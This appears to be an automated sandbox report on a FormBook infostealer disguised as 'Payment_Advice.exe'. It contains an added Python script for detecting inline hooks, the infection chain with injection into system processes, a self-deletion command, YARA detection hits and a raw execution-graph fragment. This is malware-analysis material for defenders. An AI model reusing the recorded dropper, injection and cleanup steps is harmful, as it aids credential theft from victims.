GetMessageA    INLINE     explorer.exe

Function Name  Hook Type  New Data
PeekMessageA   INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xE6
PeekMessageW   INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageW    INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageA    INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xE6
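The table reports INLINE hooks in explorer.exe on the four user32 message-loop entry points, with six bytes of new data at each. The check behind such a finding is the same one an analyst or an EDR agent can run: read the first bytes of each export in the live process, compare them with the same bytes from the clean on-disk image, and on a mismatch try to recognise a standard trampoline and compute where it lands. The following Python is an added example (not from the report) of that comparison and trampoline classification. The clean prologues and entry addresses are constructed placeholders; on a real host they come from the PE file and the loaded module's export table. The live bytes are the New Data values above, and on these six bytes none of the usual trampolines matches, which is exactly the case where the region should be dumped and disassembled rather than assumed to be a jmp.

```python
import struct

# The six bytes the report lists as New Data at each hooked entry point.
REPORTED_NEW_DATA = {
    "PeekMessageA": bytes.fromhex("48 8B B8 8C CE E6"),
    "PeekMessageW": bytes.fromhex("48 8B B8 84 4E E6"),
    "GetMessageW":  bytes.fromhex("48 8B B8 84 4E E6"),
    "GetMessageA":  bytes.fromhex("48 8B B8 8C CE E6"),
}

# Constructed stand-ins for what an agent reads from the clean image (first bytes
# of each export) and from the export table (entry addresses). Real values are
# build-specific and are not in the report.
CLEAN_PROLOGUES = {name: bytes.fromhex("48 89 5C 24 08 57") for name in REPORTED_NEW_DATA}
ENTRY_VAS = {name: 0x7FF8_1000_0000 + 0x1000 * i for i, name in enumerate(REPORTED_NEW_DATA)}

MASK64 = (1 << 64) - 1


def classify_trampoline(entry_va: int, code: bytes, x64: bool = True):
    """Recognise the trampolines inline hooks usually write at a function entry and
    compute where control goes. Returns (kind, target) or None. For 'jmp [mem]' the
    value is the address of the pointer slot, not the final destination."""
    if len(code) >= 5 and code[0] == 0xE9:                      # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (entry_va + 5 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xFF\x25":              # jmp [rip+disp32] / jmp [abs32]
        if x64:
            disp = struct.unpack_from("<i", code, 2)[0]
            return "jmp [mem]", (entry_va + 6 + disp) & MASK64
        return "jmp [mem]", struct.unpack_from("<I", code, 2)[0]
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:  # push imm32; ret
        return "push/ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax/jmp rax", struct.unpack_from("<Q", code, 2)[0]   # mov rax, imm64; jmp rax
    return None


def check_hook(name: str, entry_va: int, clean: bytes, live: bytes, x64: bool = True) -> dict:
    """Compare live entry bytes with the clean prologue; on mismatch report the
    trampoline kind and target, or mark the rewrite as unrecognised."""
    n = min(len(clean), len(live))
    if clean[:n] == live[:n]:
        return {"function": name, "hooked": False}
    tramp = classify_trampoline(entry_va, live, x64)
    return {
        "function": name,
        "hooked": True,
        "kind": tramp[0] if tramp else "unrecognised rewrite",
        "target": tramp[1] if tramp else None,
        "live": live[:n].hex(" "),
    }


def scan(entry_vas, clean, live, x64=True):
    """Run check_hook over every function present in both the clean and live sets."""
    return [check_hook(n, entry_vas[n], clean[n], live[n], x64) for n in clean if n in live]


if __name__ == "__main__":
    for result in scan(ENTRY_VAS, CLEAN_PROLOGUES, REPORTED_NEW_DATA):
        print(result)
```

A prologue comparison of this kind is only as good as its clean reference: the on-disk bytes must be taken after the loader's own relocations and import fixups are accounted for, otherwise every relocated absolute address shows up as a false hook.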


Target ID: 0
Start time: 15:45:01
Start date: 06/10/2023
Path: C:\Users\user\Desktop\Payment_Advice.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Payment_Advice.exe
Imagebase: 0x500000
File size: 1'131'860 bytes
MD5 hash: 15B3674E7FE8C5FE5284BC290A09ECB8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 15:45:06
Start date: 06/10/2023
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe"
Imagebase: 0xe20000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 15:45:14
Start date: 06/10/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg
Imagebase: 0x7ff67e6d0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 15:45:14
Start date: 06/10/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 15:45:14
Start date: 06/10/2023
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp
Wow64 process (32bit): true
Commandline: ewdbwwfpdh.bmp fjrpidauk.jpg
Imagebase: 0x170000
File size: 947'288 bytes
MD5 hash: 874798CB576E238642281B10189B031C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 13%, ReversingLabs
Reputation: low
Has exited: true

                                                                                                  Target ID:7
                                                                                                  Start time:15:45:17
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                                  Imagebase:0xa40000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:15:45:17
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:15:45:18
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:ipconfig /renew
                                                                                                  Imagebase:0x3a0000
                                                                                                  File size:29'184 bytes
                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:15:45:22
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Imagebase:0xf0000
                                                                                                  File size:45'984 bytes
                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:15:45:22
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Imagebase:0xc00000
                                                                                                  File size:45'984 bytes
                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:15:45:22
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                  Imagebase:0x7ff62d7d0000
                                                                                                  File size:5'141'208 bytes
                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000F.00000002.3875577794.00000000106B5000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  Target ID:16
                                                                                                  Start time:15:45:26
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Imagebase:0xa40000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:17
                                                                                                  Start time:15:45:29
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                  Imagebase:0xa40000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:15:45:29
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:9.6%
                                                                                                    Total number of Nodes:1599
                                                                                                    Total number of Limit Nodes:47
                                                                                                    execution_graph: [interactive execution graph not reproducible as text; the node/edge listing (function addresses, API names and call counts) is omitted here]
51e8ca 23507->23508 23517 51e8ee 23507->23517 23509 51e7fb DloadReleaseSectionWriteAccess 6 API calls 23508->23509 23510 51e8d5 RaiseException 23509->23510 23511 51eac3 23510->23511 23511->23503 23512 51e966 LoadLibraryExA 23513 51e9c7 23512->23513 23514 51e979 GetLastError 23512->23514 23516 51e9d9 23513->23516 23518 51e9d2 FreeLibrary 23513->23518 23519 51e9a2 23514->23519 23520 51e98c 23514->23520 23515 51ea37 GetProcAddress 23522 51ea47 GetLastError 23515->23522 23526 51ea95 23515->23526 23516->23515 23516->23526 23517->23512 23517->23513 23517->23516 23517->23526 23518->23516 23521 51e7fb DloadReleaseSectionWriteAccess 6 API calls 23519->23521 23520->23513 23520->23519 23523 51e9ad RaiseException 23521->23523 23524 51ea5a 23522->23524 23523->23511 23524->23526 23527 51e7fb DloadReleaseSectionWriteAccess 6 API calls 23524->23527 23540 51e7fb 23526->23540 23528 51ea7b RaiseException 23527->23528 23529 51e5bb ___delayLoadHelper2@8 6 API calls 23528->23529 23530 51ea92 23529->23530 23530->23526 23532 51e5c7 23531->23532 23533 51e5ed 23531->23533 23548 51e664 23532->23548 23533->23507 23535 51e5cc 23536 51e5e8 23535->23536 23551 51e78d 23535->23551 23556 51e5ee GetModuleHandleW GetProcAddress GetProcAddress 23536->23556 23539 51e836 23539->23507 23541 51e80d 23540->23541 23542 51e82f 23540->23542 23543 51e664 DloadReleaseSectionWriteAccess 3 API calls 23541->23543 23542->23511 23544 51e812 23543->23544 23545 51e82a 23544->23545 23547 51e78d DloadProtectSection 3 API calls 23544->23547 23559 51e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23545->23559 23547->23545 23557 51e5ee GetModuleHandleW GetProcAddress GetProcAddress 23548->23557 23550 51e669 23550->23535 23554 51e7a2 DloadProtectSection 23551->23554 23552 51e7a8 23552->23536 23553 51e7dd VirtualProtect 23553->23552 23554->23552 23554->23553 23558 51e6a3 VirtualQuery GetSystemInfo 23554->23558 23556->23539 23557->23550 23558->23553 23559->23542 25543 520ada 51 API calls 2 
library calls 25587 51b5c0 100 API calls 25588 5177c0 119 API calls 25589 51ffc0 RaiseException _com_raise_error _com_error::_com_error 23763 51dec2 23764 51decf 23763->23764 23771 50e617 23764->23771 23767 504092 _swprintf 51 API calls 23768 51def1 SetDlgItemTextW 23767->23768 23775 51b568 PeekMessageW 23768->23775 23772 50e627 23771->23772 23780 50e648 23772->23780 23776 51b583 GetMessageW 23775->23776 23777 51b5bc 23775->23777 23778 51b599 IsDialogMessageW 23776->23778 23779 51b5a8 TranslateMessage DispatchMessageW 23776->23779 23778->23777 23778->23779 23779->23777 23786 50d9b0 23780->23786 23783 50e645 23783->23767 23784 50e66b LoadStringW 23784->23783 23785 50e682 LoadStringW 23784->23785 23785->23783 23791 50d8ec 23786->23791 23788 50d9cd 23789 50d9e2 23788->23789 23799 50d9f0 26 API calls 23788->23799 23789->23783 23789->23784 23792 50d904 23791->23792 23797 50d984 _strncpy 23791->23797 23794 50d928 23792->23794 23800 511da7 WideCharToMultiByte 23792->23800 23798 50d959 23794->23798 23801 50e5b1 50 API calls __vsnprintf 23794->23801 23797->23788 23802 526159 26 API calls 3 library calls 23798->23802 23799->23789 23800->23794 23801->23798 23802->23797 25545 5162ca 124 API calls __InternalCxxFrameHandler 25547 505ef0 82 API calls 25591 5095f0 80 API calls 25592 51fd4f 9 API calls 2 library calls 23810 5298f0 23818 52adaf 23810->23818 23813 529904 23815 52990c 23816 529919 23815->23816 23826 529920 11 API calls 23815->23826 23827 52ac98 23818->23827 23821 52adee TlsAlloc 23822 52addf 23821->23822 23823 51fbbc _ValidateLocalCookies 5 API calls 23822->23823 23824 5298fa 23823->23824 23824->23813 23825 529869 20 API calls 2 library calls 23824->23825 23825->23815 23826->23813 23828 52acc8 23827->23828 23831 52acc4 23827->23831 23828->23821 23828->23822 23829 52ace8 23829->23828 23832 52acf4 GetProcAddress 23829->23832 23831->23828 23831->23829 23834 52ad34 23831->23834 23833 52ad04 __dosmaperr 23832->23833 23833->23828 23835 52ad55 LoadLibraryExW 23834->23835 
23840 52ad4a 23834->23840 23836 52ad72 GetLastError 23835->23836 23837 52ad8a 23835->23837 23836->23837 23838 52ad7d LoadLibraryExW 23836->23838 23839 52ada1 FreeLibrary 23837->23839 23837->23840 23838->23837 23839->23840 23840->23831 23842 52abf0 23843 52abfb 23842->23843 23845 52ac24 23843->23845 23846 52ac20 23843->23846 23848 52af0a 23843->23848 23855 52ac50 DeleteCriticalSection 23845->23855 23849 52ac98 __dosmaperr 5 API calls 23848->23849 23850 52af31 23849->23850 23851 52af4f InitializeCriticalSectionAndSpinCount 23850->23851 23852 52af3a 23850->23852 23851->23852 23853 51fbbc _ValidateLocalCookies 5 API calls 23852->23853 23854 52af66 23853->23854 23854->23843 23855->23846 25548 5288f0 7 API calls ___scrt_uninitialize_crt 25550 522cfb 38 API calls 4 library calls 23895 51b7e0 23896 51b7ea __EH_prolog 23895->23896 24065 501316 23896->24065 23899 51b841 23900 51b82a 23900->23899 23903 51b838 23900->23903 23904 51b89b 23900->23904 23901 51bf0f 24138 51d69e 23901->24138 23907 51b878 23903->23907 23908 51b83c 23903->23908 23906 51b92e GetDlgItemTextW 23904->23906 23912 51b8b1 23904->23912 23906->23907 23911 51b96b 23906->23911 23907->23899 23915 51b95f EndDialog 23907->23915 23908->23899 23918 50e617 53 API calls 23908->23918 23909 51bf38 23913 51bf41 SendDlgItemMessageW 23909->23913 23914 51bf52 GetDlgItem SendMessageW 23909->23914 23910 51bf2a SendMessageW 23910->23909 23916 51b980 GetDlgItem 23911->23916 24063 51b974 23911->24063 23917 50e617 53 API calls 23912->23917 23913->23914 24156 51a64d GetCurrentDirectoryW 23914->24156 23915->23899 23920 51b994 SendMessageW SendMessageW 23916->23920 23921 51b9b7 SetFocus 23916->23921 23922 51b8ce SetDlgItemTextW 23917->23922 23923 51b85b 23918->23923 23920->23921 23925 51b9c7 23921->23925 23938 51b9e0 23921->23938 23926 51b8d9 23922->23926 24176 50124f SHGetMalloc 23923->24176 23924 51bf82 GetDlgItem 23928 51bfa5 SetWindowTextW 23924->23928 23929 51bf9f 23924->23929 23931 50e617 53 API calls 23925->23931 23926->23899 
